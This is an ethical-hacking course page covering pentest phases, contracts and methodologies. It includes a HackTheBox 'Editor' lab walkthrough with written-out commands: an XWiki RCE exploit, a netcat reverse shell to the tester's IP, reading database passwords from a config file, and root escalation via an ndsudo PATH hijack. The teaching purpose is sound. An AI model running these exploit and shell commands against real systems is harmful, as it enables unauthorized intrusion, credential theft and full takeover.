Quartz 4

09 - Ethical Hacking

4 min read

Ethical Hacking

Objectives: By the end of this topic, you will be able to…

  • Execute a basic pentest with a clear methodology
  • Use Kali Linux tools in each phase of ethical hacking
  • Document findings professionally
  • Act within a legal and ethical framework

What is ethical hacking?

Ethical hacking is the practice of assessing the security of computer systems in a controlled, legal way with explicit consent from the owner. The goal is to identify vulnerabilities before malicious actors exploit them.

An ethical hacker (pentester) simulates real attacks to strengthen security. Unlike malicious hackers (black hats), ethical hackers (white hats) act responsibly and professionally within a legal and ethical framework.

AspectEthical HackingMalicious Hacking
IntentionProtect and improve securityObtain personal gain
LegalityWith authorizationWithout consent
DocumentationRequires technical reportAvoids leaving traces
Defined scopeYes, established by contractDoes not respect boundaries
ConsequencesSecurity improvementsReputational, financial, or legal damage

Phases of ethical hacking

1. Reconnaissance

Collect information about the target without directly interacting with it: websites, domains, DNS records, technologies in use, emails, employee names, leaks.

Common tools: whois, nslookup, theHarvester, Shodan, Maltego

2. Scanning and enumeration

Interact directly with the target to identify services, open ports, and attack vectors. Enumerate users, software versions, entry points.

Common tools: nmap, nikto, dirb, enum4linux

3. Exploitation

Leverage identified vulnerabilities to obtain unauthorized access. Demonstrates whether a finding is truly exploitable.

Common tools: sqlmap, msfconsole, exploit-db, custom scripts

4. Post-exploitation

Assess the impact once inside the system: privileges obtained, data accessible, possibility of persistent access.

Possible activities: dumping passwords, lateral movement, extracting tokens or keys.

5. Reporting

Document all activities: vulnerabilities found, severity, evidence (screenshots, logs, commands), mitigation recommendations. Reports should be clear, technical, and reproducible.

Before any pentest activity, a signed legal agreement must define:

  • Scope: which systems are authorized, allowed times, depth of testing
  • Limitations: what is not permitted (e.g., no DoS)
  • Legal liability: damage limits, protection for the tester
  • Confidentiality: nondisclosure agreement (NDA)

Never perform a penetration test without a formal contract or agreement.

Recognized pentesting methodologies

PTES (Penetration Testing Execution Standard)

Comprehensive framework covering: pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

OSSTMM (Open Source Security Testing Methodology Manual)

Broad, scientific approach covering human, physical, electronic, and process aspects. Defines zones of interaction and quantitative metrics.

Hands-on lab

Requirements: Kali Linux with HackTheBox VPN, machine “Editor”

Safety and ethics

  • Only attack machines you have explicit permission to test
  • Record your steps for reproducibility and grading
  • Use disposable VMs or containers to avoid damaging your host system

Part 0: Connect to HTB via OpenVPN

sudo openvpn --config ~/Downloads/HTB-yourvpn.ovpn

Verify with ip a (check for tun0 interface) and ping 10.10.11.80.

Part 1: Reconnaissance with nmap

nmap -sC -sV -p- -oA editor_initial 10.10.11.80

Interpret the output: SSH on 22, nginx on 80, Jetty/XWiki on 8080. Identify potential attack surfaces from version strings and service configurations.

Part 2: Hostname resolution

sudo nano /etc/hosts
# add: 10.10.11.80    editor.htb

Part 3: Identify and exploit XWiki RCE

  1. Review exploit PoC repository (read the code before running):
git clone https://github.com/gunzf0x/CVE-2025-24893
  1. Prepare a listener:
nc -lvnp 4444
  1. Trigger the exploit:
python CVE-2024-24893.py -t http://editor.htb:8080/ -c 'busybox nc <your-ip> 4444 -e /bin/bash'

Part 4: Post-exploitation — finding credentials

  1. Enumerate filesystem and users:
id && whoami && hostname
cat /etc/passwd | grep -E 'xwiki|oliver'
  1. Search for configuration files with credentials:
find / -type f -name "hibernate.cfg.xml" 2>/dev/null
cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep -i password -n
  1. Switch user with found credentials:
su oliver

Part 5: Privilege escalation vectors

find / -perm -4000 -o -perm -2000 -type f -exec ls -ld {} \; 2>/dev/null
sudo -l

Identify unusual SUID binaries (e.g., ndsudo in /opt/netdata/).

Part 6: Exploiting CVE-2024-32019

  1. Compile the PoC:
gcc poc.c -o nvme
  1. Transfer to target and exploit:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
  1. Validate: whoami should return root

Cleanup

rm -f /tmp/nvme

Submission

ZIP file containing:

  • PDF report (executive summary, methodology, prioritized findings, remediation guidance)
  • Raw commands transcript
  • Screenshots directory (named by step)
  • PoC directory with payloads and scripts used
  • One paragraph per vulnerability explaining why the exploit worked and one mitigation

Key concepts

TermDefinition
Hacking eticoAuthorized security assessment simulating real attacks
PentestingPenetration testing with a structured methodology
MetasploitExploitation framework for security assessments
NmapPort scanning and service discovery tool
Reverse shellConnection initiated from the compromised system to the attacker
PTESStandard that defines the phases of a professional pentest

Test yourself

  1. Methodology: Describe the five phases of ethical hacking and explain why the order is important. What happens if you skip directly to the exploitation phase?

  2. Legal: What elements should a pentest contract contain before starting any activity? Why is it critical to define the scope?

  3. Technical: In the lab, a reverse shell was used. Explain why an attacker prefers a reverse shell over a bind shell. What advantage does it offer against firewalls?

Navigation:Previous | Home | Next

Graph View

Backlinks